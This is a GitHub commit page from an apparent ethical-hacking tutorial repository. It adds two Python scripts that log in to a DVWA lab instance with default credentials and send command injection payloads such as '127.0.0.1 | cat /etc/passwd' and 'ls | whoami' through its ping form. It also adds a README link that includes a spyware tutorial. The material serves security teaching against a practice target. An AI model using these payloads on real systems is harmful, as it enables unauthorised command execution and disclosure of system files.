Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

Commita7a830c

Browse files
committed
add exploit command injection vulnerabilities tutorial
1 parent496d18a commita7a830c

File tree

7 files changed

+575
-0
lines changed

7 files changed

+575
-0
lines changed

‎README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -65,6 +65,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
6565
-[How to Remove Metadata from PDFs in Python](https://thepythoncode.com/article/how-to-remove-metadata-from-pdfs-in-python). ([code](ethical-hacking/pdf-metadata-remover))
6666
-[How to Extract Metadata from Docx Files in Python](https://thepythoncode.com/article/docx-metadata-extractor-in-python). ([code](ethical-hacking/docx-metadata-extractor))
6767
-[How to Build Spyware in Python](https://thepythoncode.com/article/how-to-build-spyware-in-python). ([code](ethical-hacking/spyware))
68+
-[How to Exploit Command Injection Vulnerabilities in Python](https://thepythoncode.com/article/how-to-exploit-command-injection-vulnerabilities-in-python). ([code](ethical-hacking/exploit-command-injection))
6869

6970
-###[Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
7071
-###[Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
#[How to Exploit Command Injection Vulnerabilities in Python](https://thepythoncode.com/article/how-to-exploit-command-injection-vulnerabilities-in-python)
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
# Import the necessary libraries.
2+
importrequests
3+
fromurllib.parseimporturljoin
4+
5+
# Define the target URL and login credentials.
6+
target_url="http://192.168.134.129/dvwa/"
7+
login_url=urljoin(target_url,"login.php")
8+
login_data= {
9+
"username":"admin",
10+
"password":"password",
11+
"Login":"Login"
12+
}
13+
14+
# Define the vulnerable page URL.
15+
vuln_page_url=urljoin(target_url,"vulnerabilities/exec/")
16+
17+
# Define the test payload.
18+
payload="127.0.0.1 | cat /etc/passwd"
19+
20+
21+
defcheck_command_injection(base_url,login_url,login_data,vuln_page_url):
22+
print(f"[!] Checking for command injection vulnerabilities at{vuln_page_url}")
23+
24+
# Authenticate with the application (DVWA).
25+
session=requests.Session()
26+
response=session.post(login_url,data=login_data)
27+
28+
if"Login failed"inresponse.text:
29+
print("[-] Authentication failed. Please check the credentials.")
30+
return
31+
32+
# Send the payload through the form.
33+
form_data= {
34+
"ip":payload,
35+
"submit":"Submit"
36+
}
37+
38+
try:
39+
response=session.post(vuln_page_url,data=form_data)
40+
print(f"[!] Payload used:{payload}")
41+
print("[+] Response after command injection:\n")
42+
print("="*80)
43+
print(response.text)
44+
print("="*80)
45+
print("\n[!] Please inspect the response to determine if the parameter is vulnerable to command injection.\n")
46+
47+
# Write the response to a text file.
48+
withopen("response.txt","w")asf:
49+
f.write(response.text)
50+
print("[+] Response written to response.txt")
51+
exceptExceptionase:
52+
print(f"[-] Error occurred while testing payload '{payload}':{e}")
53+
54+
print("[+] Command injection testing completed.\n")
55+
56+
57+
# Call the function with the required parameters.
58+
check_command_injection(target_url,login_url,login_data,vuln_page_url)
Lines changed: 75 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,75 @@
1+
# Import the necessary libraries.
2+
importrequests
3+
fromurllib.parseimporturljoin
4+
fromcoloramaimportFore,Style,init
5+
6+
# Initialise colorama.
7+
init()
8+
9+
10+
# Define the target URL and login credentials.
11+
target_url="http://192.168.134.129/dvwa/"
12+
login_url=urljoin(target_url,"login.php")
13+
login_data= {
14+
"username":"admin",
15+
"password":"password",
16+
"Login":"Login"
17+
}
18+
19+
# Define the vulnerable page URL.
20+
vuln_page_url=urljoin(target_url,"vulnerabilities/exec/")
21+
22+
# Define the test payloads.
23+
payloads= [
24+
"ls | whoami",
25+
"127.0.0.1 | cat /etc/passwd",
26+
"127.0.0.1 | ls -la"
27+
]
28+
29+
defcheck_command_injection(base_url,login_url,login_data,vuln_page_url,payloads):
30+
print(f"[!] Checking for command injection vulnerabilities at{vuln_page_url}")
31+
32+
# Authenticate with the application.
33+
session=requests.Session()
34+
response=session.post(login_url,data=login_data)
35+
36+
if"Login failed"inresponse.text:
37+
print("[-] Authentication failed. Please check the credentials.")
38+
return
39+
40+
responses=""
41+
42+
forpayloadinpayloads:
43+
# Send the payload through the form.
44+
form_data= {
45+
"ip":payload,
46+
"submit":"Submit"
47+
}
48+
49+
try:
50+
response=session.post(vuln_page_url,data=form_data)
51+
print(f"{Fore.GREEN}[!] Payload used:{payload}{Style.RESET_ALL}")
52+
print("[+] Response after command injection:\n")
53+
print("="*80)
54+
print(response.text)
55+
print("="*80)
56+
print(f"\n{Fore.YELLOW}[!] Please manually inspect the response to determine if the parameter is vulnerable to command injection.{Style.RESET_ALL}\n")
57+
58+
responses+=f"[!] Payload used:{payload}\n"
59+
responses+="[+] Response after command injection:\n"
60+
responses+="="*80+"\n"
61+
responses+=response.text
62+
responses+="="*80+"\n\n"
63+
exceptExceptionase:
64+
print(f"{Fore.RED}[-] Error occurred while testing payload '{payload}':{e}{Style.RESET_ALL}")
65+
responses+=f"[-] Error occurred while testing payload '{payload}':{e}\n"
66+
67+
# Write the responses to a text file.
68+
withopen("multiple_payload_response.txt","w")asf:
69+
f.write(responses)
70+
print("[+] Responses written to response.txt")
71+
72+
print("[+] Command injection testing completed.\n")
73+
74+
# Call the function with the required parameters.
75+
check_command_injection(target_url,login_url,login_data,vuln_page_url,payloads)

0 commit comments

Comments
 (0)
[8]ページ先頭
©2009-2025 Movatter.jp